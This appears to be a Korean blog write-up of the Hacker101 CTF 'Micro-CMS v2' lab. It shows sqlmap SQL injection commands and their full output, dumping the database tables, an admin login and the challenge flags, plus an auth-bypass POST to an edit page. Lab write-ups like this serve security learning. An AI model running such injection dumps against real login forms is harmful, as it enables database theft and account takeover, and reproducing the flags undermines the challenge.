Micro-CMS v2 (Moderate, 3)
Flag0
/page/3 에 접근하면 status code가 403임을 볼 수 있다.
/login 에서는 SQL Injection으로 데이터베이스의 정보를 가져올 수 있다.
|
syine@MinetaLinux:~/repos/sqlmap-dev$ python3 sqlmap.py -u "http://35.227.24.107/9aaa0fe573/login" --data="username=1&password=1" --method=POST --threads=4 --tamper=space2comment --current-db
[07:15:31] [INFO] fetching current database
[07:15:31] [INFO] retrieving the length of query output
[07:15:31] [INFO] retrieved: 6
[07:15:44] [INFO] retrieved: level2
current database: 'level2'
syine@MinetaLinux:~/repos/sqlmap-dev$ python3 sqlmap.py -u "http://35.227.24.107/9aaa0fe573/login" --data="username=1&password=1" --method=POST --threads=4 --tamper=space2comment -D level2 --tables
[07:18:44] [INFO] fetching tables for database: 'level2'
[07:18:44] [INFO] fetching number of tables for database 'level2'
[07:18:45] [INFO] resumed: 2
[07:18:45] [INFO] retrieving the length of query output
[07:18:45] [INFO] resumed: 6
[07:18:45] [INFO] resumed: admins
[07:18:45] [INFO] retrieving the length of query output
[07:18:45] [INFO] resumed: 5
[07:18:45] [INFO] resumed: pages
Database: level2
[2 tables]
+--------+
| admins |
| pages |
+--------+
|
pages라는 테이블을 덤프해서 page가 3인 게시글의 body를 읽으면 플래그를 얻을 수 있다.
|
syine@MinetaLinux:~/repos/sqlmap-dev$ python3 sqlmap.py -u "http://35.227.24.107/9aaa0fe573/login" --data="username=1&password=1" --method=POST --threads=4 --tamper=space2comment -D level2 -T pages --dump
[07:41:03] [INFO] fetching columns for table 'pages' in database 'level2'
[07:41:03] [INFO] resumed: 4
[07:41:03] [INFO] retrieving the length of query output
[07:41:03] [INFO] resumed: 2
[07:41:03] [INFO] resumed: id
[07:41:03] [INFO] retrieving the length of query output
[07:41:03] [INFO] resumed: 6
[07:41:03] [INFO] resumed: public
[07:41:03] [INFO] retrieving the length of query output
[07:41:03] [INFO] resumed: 5
[07:41:03] [INFO] resumed: title
[07:41:03] [INFO] retrieving the length of query output
[07:41:03] [INFO] resumed: 4
[07:41:03] [INFO] resumed: body
[07:41:03] [INFO] fetching entries for table 'pages' in database 'level2'
[07:41:03] [INFO] fetching number of entries for table 'pages' in database 'level2'
[07:41:03] [INFO] resumed: 3
[07:41:03] [INFO] retrieving the length of query output
[07:41:03] [INFO] resumed: 314
[07:41:03] [INFO] resuming partial value: ## Version 2\nThis version fixed the multit
[07:45:16] [INFO] retrieved: ## Version 2 This version fixed the multitude of security flaws and general functionality bugs that plagued v1. Additionally, we added user authentication; we're still not sure why we didn't think about that the first time, but hindsight is 20/20. By default, users need to be an admin to add or edit pages now.
[07:45:16] [INFO] retrieving the length of query output
[07:45:16] [INFO] retrieved: 1
[07:45:20] [INFO] retrieved: 1
[07:45:24] [INFO] retrieving the length of query output
[07:45:24] [INFO] retrieved: 1
[07:45:27] [INFO] retrieved: 1
[07:45:33] [INFO] retrieving the length of query output
[07:45:33] [INFO] retrieved: 19
[07:45:57] [INFO] retrieved: Micro-CMS Changelog
[07:45:57] [INFO] retrieving the length of query output
[07:45:57] [INFO] retrieved: 198
[07:49:14] [INFO] retrieved: Just testing some markdown functionality.  <button>Some button</button>
[07:49:14] [INFO] retrieving the length of query output
[07:49:14] [INFO] retrieved: 1
[07:49:17] [INFO] retrieved: 2
[07:49:22] [INFO] retrieving the length of query output
[07:49:22] [INFO] retrieved: 1
[07:49:27] [INFO] retrieved: 1
[07:49:32] [INFO] retrieving the length of query output
[07:49:32] [INFO] retrieved: 13
[07:49:51] [INFO] retrieved: Markdown Test
[07:49:51] [INFO] retrieving the length of query output
[07:49:51] [INFO] retrieved: 89
[07:51:31] [INFO] retrieved: My secret is ^FLAG^8c960a5a298f1d68807144f9892d1a78a5f9333a6547c8b7449c369d6cc747a6$FLAG$
[07:51:31] [INFO] retrieving the length of query output
[07:51:31] [INFO] retrieved: 1
[07:51:35] [INFO] retrieved: 3
[07:51:41] [INFO] retrieving the length of query output
[07:51:41] [INFO] retrieved: 1
[07:51:44] [INFO] retrieved: 0
[07:51:49] [INFO] retrieving the length of query output
[07:51:49] [INFO] retrieved: 12
[07:52:08] [INFO] retrieved: Private Page
Database: level2
Table: pages
[3 entries]
+----+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+--------+
| id | body | title | public |
+----+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+--------+
| 1 | ## Version 2\nThis version fixed the multitude of security flaws and general functionality bugs that plagued v1. Additionally, we added user authentication; we're still not sure why we didn't think about that the first time, but hindsight is 20/20. By default, users need to be an admin to add or edit pages now.\n | Micro-CMS Changelog | 1 |
| 2 | Just testing some markdown functionality.\n\n\n\n<button>Some button</button> | Markdown Test | 1 |
| 3 | My secret is ^FLAG^8c960a5a298f1d68807144f9892d1a78a5f9333a6547c8b7449c369d6cc747a6$FLAG$ | Private Page | 0 |
+----+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+--------+
|
Flag: ^FLAG^8c960a5a298f1d68807144f9892d1a78a5f9333a6547c8b7449c369d6cc747a6$FLAG$
Flag1
이전의 문제에서 /edit/<id> 페이지를 통해 글 제목과 내용을 수정할 수 있었다. POST로 title과 body를 설정해서 요청을 보내주면 서버 응답으로 플래그가 날아온다.
Flag: ^FLAG^4c986324cc410221f14e7c22d07eab5212b047adee6c2832ae06daec5a2ef63d$FLAG$
Flag2
admins 테이블을 읽으면 1개의 관리자 계정에 대한 정보를 알 수 있다.
|
syine@MinetaLinux:~/repos/sqlmap-dev$ python3 sqlmap.py -u "http://35.227.24.107/9aaa0fe573/login" --data="username=1&password=1" --method=POST --threads=4 --tamper=space2comment -D level2 -T admins --dump
[07:20:30] [INFO] fetching columns for table 'admins' in database 'level2'
[07:20:30] [INFO] resumed: 3
[07:20:30] [INFO] retrieving the length of query output
[07:20:30] [INFO] resumed: 2
[07:20:30] [INFO] resumed: id
[07:20:30] [INFO] retrieving the length of query output
[07:20:30] [INFO] resumed: 8
[07:20:30] [INFO] resumed: username
[07:20:30] [INFO] retrieving the length of query output
[07:20:30] [INFO] resumed: 8
[07:20:30] [INFO] resumed: password
[07:20:30] [INFO] fetching entries for table 'admins' in database 'level2'
[07:20:30] [INFO] fetching number of entries for table 'admins' in database 'level2'
[07:20:30] [INFO] retrieved: 1
[07:20:34] [INFO] retrieving the length of query output
[07:20:34] [INFO] retrieved: 1
[07:20:38] [INFO] retrieved: 1
[07:20:43] [INFO] retrieving the length of query output
[07:20:43] [INFO] retrieved: 5
[07:20:55] [INFO] retrieved: jamee
[07:20:55] [INFO] retrieving the length of query output
[07:20:55] [INFO] retrieved: 6
[07:21:06] [INFO] retrieved: ladawn
Database: level2
Table: admins
[1 entry]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | jamee | ladawn |
+----+----------+----------+
|
탈취한 계정 정보로 로그인하면 플래그를 얻을 수 있다.
Flag: ^FLAG^29a451dbd0eb0af84bf1e7117053679f206a4bf73c770bab1e400dfdc6c7f101$FLAG$
'Wargame > Hacker101 CTF' 카테고리의 다른 글
| [Hacker101 CTF] Cody's First Blog (0) | 2020.02.18 |
|---|---|
| [Hacker101 CTF] Photo Gallery (0) | 2020.02.18 |
| [Hacker101 CTF] Encrypted Pastebin (0) | 2020.02.16 |
| [Hacker101 CTF] Micro-CMS v1 (0) | 2020.02.15 |
| [Hacker101 CTF] A little something to get you started (0) | 2020.02.15 |
